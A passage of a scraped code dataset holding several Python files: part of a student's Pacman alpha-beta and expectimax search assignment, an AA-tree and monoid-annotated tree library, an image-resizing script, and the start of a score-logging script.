move]\n else:\n # '''min agent'''\n v = [float(\"inf\"), None]\n # minAgent(state, depth)\n # for agent in range(gameState.getNumAgents()):\n legalMoves = state.getLegalActions(agent) # find the moves to take\n # print('agent ', agent, 'legalMoves ', legalMoves)\n if agent==state.getNumAgents()-1:\n depth+=1\n # print(bcolors.OKBLUE, 'agent ', agent, 'legalMoves ', legalMoves, bcolors.ENDC)\n for move in legalMoves:\n # print(bcolors.FAIL, 'agent ', agent, 'move ', move, 'ENTER', bcolors.ENDC)\n nextState = state.generateSuccessor(agent, move) # get the state after making the move\n score, moveReturned = self.AlphaBetaSearch(state=nextState, depth=depth, agent=agent+1, alphabeta=alphabeta[:]) # find the value from the new state\n # print(bcolors.FAIL, 'agent ', agent, 'move ', move, 'score ', score, 'bestScore ', v[0], 'alphabeta ', alphabeta, bcolors.ENDC)\n if agent is 0:\n if score>v[0]: # if this state's value is greater than previous value for this turn i.e. best move\n v = [score, move]\n if v[0]>alphabeta[0]: # if the current value is greater than previous best solution for MAX player\n alphabeta[0] = v[0]\n # print('alphabeta[{0}] {1}' .format(agent, alphabeta[agent]))\n # alphabeta[0] = max(v[0],alphabeta[0])\n if alphabeta[0]> min(alphabeta[1:]): # if the current value is greater than MIN player's best possible value\n # if alpha value is greater than beta value of any agent, rest of the solution isn't worth exploring\n # print('alphabeta[0]> alphabeta[agent+1]: ', alphabeta[0], alphabeta[agent+1])\n break\n\n else:\n if scorealphabeta[agent]: # if the current value is lesser than MAX player's best possible value\n # print('alphabeta[0]>alphabeta[agent]: ', alphabeta[0], alphabeta[agent])\n break\n # alphabeta[agent] = min(v[0], alphabeta[agent])\n\n # print(bcolors.FAIL, 'agent ', agent, 'v ', v, 'EXIT', bcolors.ENDC)\n return v\n\nclass ExpectimaxAgent(MultiAgentSearchAgent):\n \"\"\"\n Your expectimax agent (question 4)\n \"\"\"\n\n def getAction(self, gameState):\n \"\"\"\n Returns the expectimax action using self.depth and self.evaluationFunction\n\n All ghosts should be modeled as choosing uniformly at random from their\n legal moves.\n \"\"\"\n \"*** YOUR CODE HERE ***\"\n depth = 0\n agent = 0\n score, move = self.ExpectimaxSearch(state=gameState, depth=depth, agent=agent)\n # util.raiseNotDefined()\n return move\n\n def ExpectimaxSearch(self, state, depth, agent):\n # returns [score, move]\n if depth is self.depth or state.isWin() or state.isLose():\n # print(depth, self.depth)\n return [self.evaluationFunction(state), None]\n\n agent = agent%state.getNumAgents()\n\n if agent is 0: # pacman\n # '''max agent'''\n v = [-float(\"inf\"), None]\n else:\n # '''min agent'''\n v = [0, None]\n\n legalMoves = state.getLegalActions(agent) # find the moves to take\n if agent==state.getNumAgents()-1:\n depth+=1\n # print(bcolors.OKBLUE, 'agent ', agent, 'legalMoves ', legalMoves, bcolors.ENDC)\n for move in legalMoves:\n # print(bcolors.FAIL, 'agent ', agent, 'move ', move, 'ENTER', bcolors.ENDC)\n nextState = state.generateSuccessor(agent, move) # get the state after making the move\n score, moveReturned = self.ExpectimaxSearch(state=nextState, depth=depth, agent=agent+1) # find the value from the new state\n # print(bcolors.FAIL, 'agent ', agent, 'move ', move, 'score ', score, 'bestScore ', v[0], bcolors.ENDC)\n if agent is 0:\n if score>v[0]: # if this state's value is greater than previous value for this turn i.e. best move\n v = [score, move]\n # if v[0]>alphabeta[0]: # if the current value is greater than previous best solution for MAX player\n # alphabeta[0] = v[0]\n # # print('alphabeta[{0}] {1}' .format(agent, alphabeta[agent]))\n # # alphabeta[0] = max(v[0],alphabeta[0])\n # if alphabeta[0]> min(alphabeta[1:]): # if the current value is greater than MIN player's best possible value\n # # if alpha value is greater than beta value of any agent, rest of the solution isn't worth exploring\n # # print('alphabeta[0]> alphabeta[agent+1]: ', alphabeta[0], alphabeta[agent+1])\n # break\n\n else:\n v[0] += score/len(legalMoves)\n # if scorealphabeta[agent]: # if the current value is lesser than MAX player's best possible value\n # # print('alphabeta[0]>alphabeta[agent]: ', alphabeta[0], alphabeta[agent])\n # break\n # alphabeta[agent] = min(v[0], alphabeta[agent])\n\n # print(bcolors.FAIL, 'agent ', agent, 'v ', v, 'EXIT', bcolors.ENDC)\n return v\n\ndef betterEvaluationFunction(currentGameState):\n \"\"\"\n Your extreme ghost-hunting, pellet-nabbing, food-gobbling, unstoppable\n evaluation function (question 5).\n\n DESCRIPTION: \n \"\"\"\n # value = 0\n \"*** YOUR CODE HERE ***\"\n legalActions = currentGameState.getLegalActions()\n # print('legalActions ', legalActions)\n # # for action in legalActions:\n # successorGameState = currentGameState.generatePacmanSuccessor(action) # TODO what actions to take\n successorGameState = currentGameState\n newPos = successorGameState.getPacmanPosition()\n newFood = successorGameState.getFood()\n newGhostStates = successorGameState.getGhostStates()\n newScaredTimes = [ghostState.scaredTimer for ghostState in newGhostStates]\n newGhostPositions = successorGameState.getGhostPositions()\n newCapsules = successorGameState.getCapsules()\n # print(newGhostPositions, newScaredTimes)\n score = 0 # 100*len(newGhostStates)\n for i in range(len(newGhostPositions)):\n pos = newGhostPositions[i]\n if newScaredTimes[i] is 0:\n distFromGhost = manhattan_dist(newPos, pos)\n distFromGhost += 0.01 # avoid 0 division\n # print('distFromGhost ', distFromGhost)\n if distFromGhost <= 4:\n score -= 50 / distFromGhost\n else:\n score -= 30/distFromGhost\n # else:\n # print(bcolors.OKGREEN, 'Ghost scared!', bcolors.ENDC)\n # score += 50*newScaredTimes[i]\n # print('score += 10*(sum(newScaredTimes)>0)')\n score += 10*(sum(newScaredTimes))\n # break\n pq = PriorityQueue()\n for foodPos in newFood.asList():\n dist = manhattan_dist(newPos, foodPos)\n # print(bcolors.WARNING,' distFromFood ', dist, ' at', foodPos, bcolors.ENDC)\n dist += 0.01\n pq.push([dist, foodPos], dist)\n\n # if dist<=4:\n # print(bcolors.WARNING,' distFromFood ', dist, bcolors.ENDC)\n # score += 100/dist\n\n # while pq.isEmpty() is False: # for all foods\n # dist = 0\n # if pq.isEmpty() is False:\n # dist = mazeDistance(newPos, pq.pop()[1], successorGameState)\n # # print(bcolors.WARNING, ' distFromFood ', dist, bcolors.ENDC)\n # score += 100/(dist+0.1)\n\n dist = 0\n while pq.isEmpty() is False: # for nearest food\n dist += pq.pop()[0]\n\n score += 80 / (dist+0.1)\n\n # print(str(successorGameState.getCapsules()))\n # print('len(newCapsules)', len(newCapsules))\n if sum(newScaredTimes) is 0:\n dist = 0\n for capsule in newCapsules:\n dist += manhattan_dist(newPos, capsule)\n # print(bcolors.BOLD, 'dist from capsule', dist, bcolors.ENDC)\n score += 50/(dist+0.1)\n\n # score += 50/(len(newCapsules)+0.1)\n # score += 100/successorGameState.getCapsule().count()\n\n score += 700/(newFood.count()+0.1)\n # for action in legalActions:\n # successorGameState = currentGameState.generatePacmanSuccessor(action)\n # if currentGameState.getFood().count() > successorGameState.getFood().count():\n # # print(bcolors.BOLD, 'Will get food', bcolors.ENDC)\n # score += 200\n\n # value += score/len(legalActions)\n # print('score ', score) # , 'value ', value)\n # score += 5*random.choice(range(2))\n score += 5*random.random()\n\n # print(action, newPos, newFood.count(), newGhostPositions, newScaredTimes, ' score ', score)\n return score # successorGameState.getScore()\n # util.raiseNotDefined()\n\ndef euclidian_dist(p, q):\n x = p[0]-q[0]\n y = p[1]-q[1]\n dist = x*x + y*y\n return dist\n# Abbreviation\nbetter = betterEvaluationFunction\n","sub_path":"submitted_729007628/multiAgents.py","file_name":"multiAgents.py","file_ext":"py","file_size_in_byte":22203,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"241896845","text":"\"\"\"\na helper library providing a number of fundamental tree data structures,\nultimately intended to improve performance in L{SimpleStringTree}. These data\nstructures are sufficiently generic that they might also be of use for other\npurposes.\n\"\"\"\n\nclass Node:\n \"\"\"\n Node represents a node in a binary tree. It is entirely passive, acting\n as a container much a like a C struct. Its unusual features include a\n distinction between annotation and value, and references not only to its children\n but also to its parent.\n \"\"\"\n parent = None\n \"\"\"\n @ivar: The parent of the node, or None if the node has no parent\n @type: L{Node}\n \"\"\"\n leftchild = None\n \"\"\"\n @ivar: The left child of the node, or None if the node has no left child\n @type: L{Node}\n \"\"\"\n rightchild = None\n \"\"\"\n @ivar: The right child of the node, or None if the node has no right child\n @type: L{Node}\n \"\"\"\n annotation = None\n \"\"\"\n @ivar: A piece of data associated with a node, assigned by a\n tree-specific function and satisfying a related constraint.\n @type: tree-specific type\n \"\"\"\n value = None\n \"\"\"\n @ivar: A value assigned by the user of the tree. In monoid-annotated\n trees, only the leaves typically have values, and internal nodes will\n therefore have a value of None.\n The purpose of\n the annotation is to permit the construction of monoid-annotated trees,\n which often have both highly constrained annotations and completely\n unconstrained values.\n See, for example,\n U{http://scienceblogs.com/goodmath/2009/05/finally_finger_trees.php}.\n Non-monoid-annotated trees may ignore this variable.\n @type: typically unconstrained\n \"\"\"\n\nclass AANode(Node):\n \"\"\"\n An AANode is a L{Node} that can be used in an AA tree. AA trees require\n that each node have an associated level.\n \"\"\"\n level = 1\n \"\"\"\n @ivar: The level index for the node. For more information on the level\n in AA trees, see U{http://en.wikipedia.org/wiki/AA_tree}.\n @type: int\n \"\"\"\n\nclass Walker:\n \"\"\"\n A Walker walks up and down trees according to a specific objective. Its\n goal is typically to find some particular element, such as the element\n at a specific index, or with a specific value.\n \n Walker is an abstract base class.\n \"\"\"\n def descend(self, node):\n \"\"\"\n @type node: Node\n @param node: A node from which to descend.\n @rtype: int\n @return: descend must return 0 if the node in question is the one desired,\n -1 if the left child would be better, or 1 if the right child would be\n better.\n \"\"\"\n raise\n def prepare_descend(self, *args):\n \"\"\"An optional method to prepare for descent\"\"\"\n raise\n def ascend(self, node):\n \"\"\"\n @type node: Node\n @param node: A node from which to ascend\n @rtype: bool\n @return: ascend should return True iff it should run again on the parent\n of node. It should set the walker's internal state such that a\n subsequent descent would retrace these steps.\"\"\"\n raise\n def prepare_ascend(self, *args): \n \"\"\" An optional method to prepare for ascent\"\"\"\n raise\n\nclass SearchWalker(Walker):\n \"\"\"\n A L{Walker} that can be used to search a classic binary tree. This class\n exists solely to expose the concept of the Walker. As a convention, the\n binary tree being search must satisfy::\n leftchild.annotation < annotation < rightchild.annotation\n \"\"\"\n val = 0\n compare = cmp\n def prepare_descend(self, val, comparator=cmp):\n self.val = val\n self.compare = comparator\n def descend(self, node):\n x = self.compare(node.annotation, self.val)\n return x\n def ascend(self, node):\n self.val = node.annotation\n return False\n\nclass RandomWalker(Walker):\n \"\"\"\n An experimental Walker that could be used to select a random\n sub-leaf position in a binary tree. ascent is not implemented.\n \"\"\"\n def prepare_descend(self):\n from random import choice as choice\n self.choice = choice\n def descend(self, node):\n return self.choice((-1,1))\n\ndef descend(node, walker): #move down from a root node\n \"\"\"\n @type node: L{Node}\n @param node: A node from which to start descent\n @type walker: L{Walker}\n @param walker: A L{Walker} to apply recursively from node.\n @rtype: tuple(L{Node}, int)\n @return: If the L{Walker} accepted a L{Node} n, the function\n returns (n, 0). Otherwise, the function returns (L, 1), or (L, -1),\n where L is a node that has no right or left child, respectively.\n These return values typically indicate that the walker is looking for a\n node that is not present in the tree, but, if it were present, would be\n in the (currently empty) subtree right (or left) of L.\n \"\"\"\n x = walker.descend(node)\n while x != 0:\n if x == 1:\n if node.rightchild is None:\n return (node, 1)\n else:\n node = node.rightchild\n else: #x == -1\n if node.leftchild is None:\n return (node, -1)\n else:\n node = node.leftchild\n x = walker.descend(node)\n return (node, 0)\n \ndef ascend(node, walker):\n \"\"\"\n @type node: L{Node}\n @type walker: L{Walker}\n @param node: the L{Node} from which to ascend.\n @param walker: The L{walker} with which to ascend.\n @rtype: None\n ascend causes walker to ascend until walker asks to stop or the tree's\n root node is reached. Nothing is returned; instead, state is accumulated\n inside the walker\n \"\"\"\n while node is not None and walker.ascend(node):\n node = node.parent\n\ndef search(root, val):\n \"\"\"\n @type root: L{Node}\n @type val: comparable\n Searches a correctly sorted binary tree, starting with the root Node, for\n val. Returns a node that contains val if val is present, otherwise a node\n for which val would be an acceptable child value.\n \n Provided solely as an example.\"\"\"\n w = SearchWalker\n w.prepared_descend(val)\n return descend(root, w)\n \ndef findmin(root):\n \"\"\"\n Simple search function for the leftmost element in a tree, or subtree.\n @type root: L{Node}\n @param root: The node from which to start walking.\n @rtype: L{Node}\n @return: the leftmost element in the subtree of root\n \"\"\"\n while root.leftchild is not None:\n root = root.leftchild\n return root\n\ndef findmax(root):\n \"\"\"\n Simple search function for the rightmost element in a tree, or subtree.\n @type root: L{Node}\n @param root: The node from which to start walking.\n @rtype: L{Node}\n @return: the rightmost element in the subtree of root\n \"\"\"\n while root.rightchild is not None:\n root = root.rightchild\n return root\n\nclass MonoidTree:\n \"\"\"\n A Monoid Annotation Tree is a binary tree whose nodes are each annotated\n by values from some monoid. The annotation of an internal node is computed\n by applying the operation to the annotations of its children. The annotation of a leaf\n node is specified by the user. Every node must either have two children or\n be a leaf node.\n\n Each leaf node may also be associated with an arbitrary opaque value of the user's\n choosing. This node and value will remain associated.\"\"\"\n makenode = Node\n \"\"\"\n @cvar: a factory function that returns nodes of the type required\n for this tree. It is provided so that subclasses can easily override it\n to use subtypes of L{Node}.\n \"\"\"\n def __init__(self, operation, rootnode):\n \"\"\"\n Let M be the monoid type.\n @type operation: f(M,M) -> M\n @param operation: a function taking two arguments from the monoid set\n and returning another element from the monoid set. The monoid\n operation must obey an associativity criterion; see U{http://en.wikipedia.org/wiki/Monoid#Definition}.\n @type rootnode: L{makenode}\n @param rootnode: The root node for the tree. rootnode must have a valid annotation, and its parent and children must be None.\"\"\"\n self.op = operation\n self.root = rootnode\n def _update(self, node, sentinel=None):\n \"\"\"node must be an internal node\"\"\"\n while node is not sentinel:\n #oldval = node.annotation\n node.annotation = self.op(node.leftchild.annotation, node.rightchild.annotation)\n #if oldval == node.annotation:\n # #this node has not changed, so nodes above it will also not have changed\n # break\n #else:\n node = node.parent\n _update_add = _update\n _update_del = _update\n def _split_link(self, node):\n \"\"\"Introduce and return a new node (newparent) between node and its parent\"\"\"\n newparent = self.makenode()\n newparent.parent = node.parent\n if node.parent is not None:\n if node.parent.leftchild is node:\n node.parent.leftchild = newparent\n else:\n assert node.parent.rightchild is node\n node.parent.rightchild = newparent\n else:\n self.root = newparent\n node.parent = newparent\n return newparent\n def addleft(self, new, old):\n \"\"\"\n Add a new leaf node to the left of an old leaf node. The new node's\n parent will be assigned to be a new internal node.\n @type new: makenode\n @param new: a new node, not yet present in the tree\n @type old: makenode\n @param old: A leaf node currently in the tree.\n \"\"\"\n newparent = self._split_link(old)\n newparent.rightchild = old\n newparent.leftchild = new\n new.parent = newparent\n self._update_add(newparent)\n def addright(self, new, old):\n \"\"\"\n Add a new leaf node to the right of an old leaf node. The new node's\n parent will be assigned to be a new internal node.\n @type new: makenode\n @param new: a new node, not yet present in the tree\n @type old: makenode\n @param old: A leaf node currently in the tree.\n \"\"\"\n newparent = self._split_link(old)\n newparent.rightchild = new\n newparent.leftchild = old\n new.parent = newparent\n self._update_add(newparent) \n def add(self, new, walker):\n \"\"\"\n Add a new leaf node at a position determined by walker. Acts as a\n thin wrapper around L{aatree.descend} and addleft or addright.\n If the walker descent process returns a position of zero, the new node\n will be added left of the returned node.\n @type new: makenode\n @param new: a new node to add to the tree.\n @type walker: L{Walker}\n @param walker: A walker that will determine the insertion position\n \"\"\"\n leaf, position = descend(self.root, walker)\n assert leaf.leftchild is None\n assert leaf.rightchild is None\n if position == 1:\n self.addright(new, leaf)\n else: #Makes left the default for duplicate values\n self.addleft(new, leaf)\n def remove(self, leaf):\n \"\"\"\n Remove a leaf node. The leaf will be removed from the tree, and the\n tree will retain no reference to it.\n @type leaf: makenode\n @param leaf: A leaf node to remove.\n \"\"\"\n p = leaf.parent\n if p.leftchild is leaf:\n sibling = p.rightchild\n else:\n assert p.rightchild is leaf\n sibling = p.leftchild\n gp = p.parent\n if gp.leftchild is p:\n gp.leftchild = sibling\n elif gp.rightchild is p:\n gp.rightchild = sibling\n sibling.parent = gp\n # The only remaining reference to p is now in leaf itself, and the only\n # remaining reference to leaf is in the user's hands\n self._update_del(gp)\n def change_annotation(self, leaf, newann):\n \"\"\"\n When changing the annotation of a leaf, it is required to use this method,\n so that the change may be propagated up through the tree according to the\n operation. Note that no such method is needed for the value of a leaf,\n because the value is opaque to the tree.\n @type leaf: makenode\n @param leaf: the node whose annotation should be altered\n @type newann: element of the monoid set\n @param newann: the new annotation which should be associated with leaf\n \"\"\"\n assert leaf.leftchild is None\n assert leaf.rightchild is None\n leaf.annotation = newann\n self._update(leaf.parent)\n def getnext(self, leaf, skip=None):\n \"\"\"\n Get the next rightward leaf node from leaf. Optionally, skip any nodes\n meeting some criterion.\n @type leaf: makenode\n @param leaf: The leaf node whose next rightward neighbor will be returned\n @type skip: f(makenode)->bool\n @param skip: An optional function returning True if a given node should\n be skipped. This function will be called on each internal node during\n the search, not only on leaf nodes. It will typically implement a \n criterion on the annotation such that a node will be skipped only\n if every descendant of that node would also be skipped if considered\n individually.\n \"\"\"\n assert leaf.leftchild is None\n assert leaf.rightchild is None\n node = leaf\n while ((node.parent is not None) and\n ((node.parent.rightchild is node) or \n ((skip is not None) and skip(node.parent.rightchild)))):\n # Move up until you can move right\n node = node.parent\n if (node.parent is not None) and (node.parent.leftchild is node):\n node = node.parent.rightchild\n while node.leftchild is not None:\n # Move down, staying as far left as possible.\n assert node.rightchild is not None\n if (skip is not None) and skip(node.leftchild):\n node = node.rightchild\n else:\n node = node.leftchild\n return node\n else:\n raise StopIteration(\"No next node\")\n \n def _build_subtree(self, nodes):\n #FIXME: This cannot be helpful because insertion of a subtree requires\n #rebalancing the main tree by more than one level, which is not possible\n #with a single invocation of skew and split\n L = len(nodes)\n if L == 1:\n return nodes[0]\n else:\n next = []\n sentinel = 'g' #must not be None, since None is the root sentinel\n if L % 2:\n n2 = nodes.pop()\n n1 = nodes.pop()\n newnode = self.makenode()\n newnode.parent=sentinel #totally arbitrary constant\n newnode.leftchild = n1\n n1.parent = newnode\n newnode.rightchild = n2\n n2.parent = newnode\n self._update_add(newnode, sentinel)\n nodes.append(newnode) \n for i in xrange(0,L,2):\n n1,n2 = nodes[i:(i+2)]\n newnode = self.makenode()\n newnode.parent=sentinel #totally arbitrary constant\n newnode.leftchild = n1\n n1.parent = newnode\n newnode.rightchild = n2\n n2.parent = newnode\n self._update_add(newnode, sentinel)\n \n \n\nclass SumWalker(Walker):\n \"\"\"\n SumWalker is designed to walk over full trees where each leaf has annotation 1\n and the monoid is +. Target is the zero-indexed position of the target node.\n \n There is one exception: the last node in every tree has annotation 0.\"\"\"\n target = None\n offset = None\n def prepare_descend(self, target):\n self.target = target\n self.offset = 0\n def descend(self, node):\n if node.annotation == 0: #empty leaf at the last position\n assert self.target == self.offset\n return -1\n elif node.leftchild is None: #leaf node case\n assert node.rightchild is None\n assert self.target == self.offset\n return 0\n else: #internal node case\n p = self.offset + node.leftchild.annotation\n if p <= self.target:\n self.offset = p\n return 1\n else:\n return -1\n def prepare_ascend(self):\n self.target = 0\n def ascend(self, node):\n if node.parent is not None:\n if node.parent.rightchild is node:\n self.target += node.parent.leftchild.annotation\n else:\n assert node.parent.leftchild is node\n return True\n else:\n return False\n \nclass TreeList:\n \"\"\"Implements a list-like interface, backed by a MonoidTree\"\"\"\n _treetype = MonoidTree\n def __init__(self):\n self._makenode = self._treetype.makenode\n r = self._makenode()\n r.annotation = 0\n from operator import add\n self._tree = self._treetype(add, r)\n self._walker = SumWalker()\n # We regard the fields of this walker as public API, and manipulate\n # them directly\n self._index = {}\n def __len__(self):\n return self._tree.root.annotation\n def _getnode(self, i):\n self._walker.prepare_descend(i)\n node, pos = descend(self._tree.root, self._walker)\n assert pos == 0\n return node\n def __getitem__(self, s):\n if isinstance(s, int):\n node = self._getnode(s)\n return node.value\n else:\n raise UnimplementedError\n def __setitem__(self, s, v):\n if isinstance(s, int):\n if s < len(self):\n node = self._getnode(s)\n oldv = node.value\n self._index[oldv].remove(node)\n if not self._index[oldv]:\n del self._index[oldv]\n node.value = v\n if v not in self._index:\n self._index[v] = set()\n self._index[v].add(node)\n else:\n self.insert(s, v)\n else:\n raise UnimplementedError\n def __delitem__(self, s):\n if isinstance(s, int):\n if s < len(self):\n node = self._getnode(s)\n oldv = node.value\n self._index[oldv].remove(node)\n if not self._index[oldv]:\n del self._index[oldv]\n self._tree.remove(node)\n else:\n raise UnimplementedError\n def insert(self, p, v):\n if p > len(self):\n raise IndexError(\"Index out of range\")\n self._walker.prepare_descend(p)\n newnode = self._makenode()\n newnode.annotation = 1\n newnode.value = v\n self._tree.add(newnode, self._walker)\n if v not in self._index:\n self._index[v] = set()\n self._index[v].add(newnode)\n def index(self, v):\n \"\"\"index returns some index such that self[i] == v. No promises about ordering.\"\"\"\n self._walker.prepare_ascend()\n for node in self._index[v]: #Pull one arbitrary node out of the set\n assert node.value == v\n ascend(node, self._walker)\n break\n return self._walker.target\n\nclass TreeHideList:\n \"\"\"Implements the EagerHideList interface, backed by a MonoidTree\"\"\"\n _treetype = MonoidTree\n class MultiSumWalker(Walker):\n index = 0\n target = 0\n offset = 0\n def prepare_descend(self, target, index):\n self.index = index\n self.target = target\n self.offset = 0\n def descend(self, node):\n if node.annotation == (0,0): #empty leaf at the last position\n assert self.target == self.offset\n return -1\n elif node.leftchild is None: #leaf node case\n assert node.rightchild is None\n assert self.target == self.offset\n return 0\n else: #internal node case\n p = self.offset + node.leftchild.annotation[self.index]\n if p <= self.target:\n self.offset = p\n return 1\n else:\n return -1\n def prepare_ascend(self, index):\n self.target = 0\n self.index = index\n def ascend(self, node):\n if node.parent is not None:\n if node.parent.rightchild is node:\n self.target += node.parent.leftchild.annotation[self.index]\n else:\n assert node.parent.leftchild is node\n return True\n else:\n return False\n \n @staticmethod \n def op(a,b):\n # Convention: a[0] is visible elements. a[1] is all elements.\n return (a[0] + b[0], a[1] + b[1])\n \n @staticmethod\n def skip(node):\n return node.annotation[0] == 0\n\n def __init__(self):\n self._makenode = self._treetype.makenode\n r = self._makenode()\n r.annotation = (0, 0)\n self._tree = self._treetype(self.op, r)\n self._walker = self.MultiSumWalker()\n # We regard the fields of this walker as public API, and manipulate\n # them directly\n self._index = {}\n unique = True\n if unique:\n self._index_lookup = self._index.__getitem__\n self._index_assign = self._index.__setitem__\n else:\n self._index_lookup = self._index_lookup_set\n self._index_assign = self._index_assign_set\n def _index_lookup_set(self, item):\n for v in self._index[item]:\n return v\n def _index_assign_set(self, key, value):\n if key not in self._index:\n self._index[key] = set()\n self._index[key].add(value)\n def __len__(self):\n return self._tree.root.annotation[0]\n def _getnode(self, i, a):\n self._walker.prepare_descend(i, a)\n node, pos = descend(self._tree.root, self._walker)\n assert (pos == 0) or ((pos == -1) and (i == len(self)))\n return node\n def __getitem__(self, s):\n if isinstance(s, int):\n if s < len(self): #FIXME: negative indices\n node = self._getnode(s, 0)\n return node.value\n else:\n raise IndexError(\"Index out of range\")\n else:\n start, stop, stride = s.indices(len(self))\n if start == stop:\n return []\n elif stride == 1:\n # runs in k + log(N) (amortized)\n nodes = [self._getnode(start,0)]\n k = stop - start\n while len(nodes) < k:\n nodes.append(self._tree.getnext(nodes[-1],self.skip))\n return [n.value for n in nodes]\n else:\n #FIXME: runs in k*log(N), could be reduced to k*log(step) + log(N)\n return [self[i] for i in xrange(start,stop,stride)]\n def index(self, v, visible=True):\n \"\"\"index returns some index such that self[i] == v. No promises about ordering.\"\"\"\n self._walker.prepare_ascend(0 if visible else 1)\n node = self._index_lookup(v) #Pull one arbitrary node out of the set\n assert node.value == v\n ascend(node, self._walker)\n return self._walker.target\n def hide(self, position, length):\n #self.__getitem__ is eager, so we acquire the list of nodes before\n #acting on them\n node = self._getnode(position,0)\n for i in xrange(position+1,position+length):\n self._tree.change_annotation(node,(0,1))\n node = self._tree.getnext(node, self.skip)\n self._tree.change_annotation(node,(0,1))\n #FIXME: runs in length*log(N). Could be reduced using a priority queue,\n #possibly to length + log(N)\n def getitem_all(self, s):\n if isinstance(s, int):\n node = self._getnode(s, 1)\n return node.value\n else:\n #FIXME: runs in k*log(N), could be reduced to k + log(N) by linked list\n return [self.getitem_all(i) for i in xrange(*s.indices())]\n def index_all(self, item):\n return self.index(item, False)\n def is_visible(self, i):\n node = self._getnode(i, 1)\n return node.annotation[0] == 1\n def is_visible_item(self, item):\n node = self._index_lookup(item)\n return node.annotation[0] == 1\n def insert_sequence_all(self, position, sequence, visibility):\n node = self._getnode(position,1)\n self._insert_sequence_leftofnode(node, sequence, visibility)\n def insert_sequence_leftof(self, target, sequence, visibility):\n node = self._index_lookup(target)\n self._insert_sequence_leftofnode(node, sequence, visibility)\n def _insert_sequence_leftofnode(self, node, sequence, visibility):\n for i in xrange(len(sequence)):\n v = sequence[i]\n viz = visibility[i]\n newnode = self._makenode()\n newnode.annotation = (1 if viz else 0, 1)\n newnode.value = v\n self._tree.addleft(newnode, node)\n self._index_assign(v, newnode)\n\n# Skew, split, and decrease_level are the AA balancing functions, as described\n# at http://en.wikipedia.org/wiki/AA_tree . They have been modified\n# substantially here to (1) maintain bidirectional linking and (2) maintain\n# monoid annotations.\ndef skew(node, op=None):\n L = node.leftchild\n if (L is not None) and node.level == L.level:\n node.leftchild = L.rightchild\n if node.leftchild is not None:\n node.leftchild.parent = node\n L.rightchild = node\n L.parent = node.parent\n node.parent = L\n if L.parent is not None:\n if L.parent.leftchild is node:\n L.parent.leftchild = L\n else:\n assert L.parent.rightchild is node\n L.parent.rightchild = L\n if op is not None:\n L.annotation = node.annotation\n node.annotation = op(node.leftchild.annotation, node.rightchild.annotation)\n assert L.annotation == op(L.leftchild.annotation, L.rightchild.annotation)\n # This assertion is the condition of associativity, guaranteed for any\n # valid monoid operation.\n return L\n else:\n return node\n\ndef split(node, op=None):\n R = node.rightchild\n if ((R is not None) and \n (R.rightchild is not None) and \n (node.level == R.rightchild.level)):\n node.rightchild = R.leftchild\n node.rightchild.parent = node\n \n R.leftchild = node\n R.parent = node.parent\n node.parent = R\n \n R.level += 1\n \n if R.parent is not None:\n if R.parent.leftchild is node:\n R.parent.leftchild = R\n else:\n assert R.parent.rightchild is node\n R.parent.rightchild = R\n \n if op is not None:\n R.annotation = node.annotation\n node.annotation = op(node.leftchild.annotation, node.rightchild.annotation)\n assert R.annotation == op(R.leftchild.annotation, R.rightchild.annotation)\n # This assertion is the condition of associativity, guaranteed for any\n # valid monoid operation.\n \n return R\n else:\n return node\n\ndef decrease_level(node):\n # Decrease the level of node if necessary. Returns true if a modification\n # was made.\n target = min(node.leftchild.level, node.rightchild.level) + 1\n if target < node.level:\n node.level = target\n if target < node.rightchild.level:\n node.rightchild.level = target\n return True\n return False\n\nclass AAMonoidTree(MonoidTree):\n makenode = AANode\n def _update_add(self, node, sentinel=None):\n \"\"\"node must be an internal node one level above the leaves, with\n two leaves itself.\"\"\"\n node.level = 2\n while node is not sentinel:\n #oldval = node.annotation\n node.annotation = self.op(node.leftchild.annotation, node.rightchild.annotation)\n node = skew(node, self.op)\n node = split(node, self.op)\n if node.parent is None:\n self.root = node\n node = node.parent\n def _update_del(self, node, sentinel=None):\n while node is not sentinel:\n #oldval = node.annotation\n #oldlevel = node.level\n node.annotation = self.op(node.leftchild.annotation, node.rightchild.annotation)\n \n decrease_level(node)\n \n node = skew(node, self.op)\n node.rightchild = skew(node.rightchild, self.op)\n if node.rightchild.rightchild is not None:\n node.rightchild.rightchild = skew(node.rightchild.rightchild, self.op)\n node = split(node, self.op)\n node.rightchild = split(node.rightchild, self.op)\n \n #if (oldval == node.annotation) and (oldlevel == node.level):\n # #Nodes above this point will not have changed\n # break\n \n if node.parent is None:\n self.root = node\n node = node.parent\n\nclass AATreeList(TreeList):\n _treetype = AAMonoidTree\n\nclass AATreeHideList(TreeHideList):\n _treetype = AAMonoidTree\n","sub_path":"lib/groupthink/aatree.py","file_name":"aatree.py","file_ext":"py","file_size_in_byte":29845,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"653616405","text":"from PIL import Image\nimport os, sys\nfrom subprocess import Popen\n\n\n\ndir_path = \"download\"\n\ndef resize_im(path):\n if os.path.isfile(path):\n # dm = Image.open(path)\n # dm.save(os.path.join(parent_dir, img_name)+'.jpg', 'JPEG')\n im = Image.open(path).resize((100,100), Image.ANTIALIAS)\n parent_dir = os.path.dirname(path)\n img_name = os.path.basename(path).split('.')[0]\n im.save(os.path.join(parent_dir, img_name + '.jpg'), 'JPEG', quality=90)\n\ndef resize_all(mydir):\n for subdir , _ , fileList in os.walk(mydir):\n for f in fileList:\n try:\n full_path = os.path.join(subdir,f)\n resize_im(full_path)\n except Exception as e:\n try:\n os.remove(full_path)\n print('Unable to resize %s.Hence deleted' % full_path)\n except Exception as e:\n print(\"Important! undeleteable unrecognised file found: %s\" % full_path)\n\n\ndef bat():\n p = Popen(\"rename.bat\")\n stdout, stderr = p.communicate()\n\nif __name__ == '__main__':\n bat()\n resize_all(dir_path)","sub_path":"datasetbot 9000/ImageResizer.py","file_name":"ImageResizer.py","file_ext":"py","file_size_in_byte":1137,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"594966385","text":"f = open(\"scores.txt\", \"w\")\n\nwhile True:\n # ask for input\n participant = input(\"Participant name: \")\n\n # break out of loop\n if participant == \"quit\":\n print(\"Quit.\")\n break\n\n # ask for score\n score = input(\"Score for \" + participant + \": \")\n\n # write to file and add new file\n f.write(participant + \",\" + score + 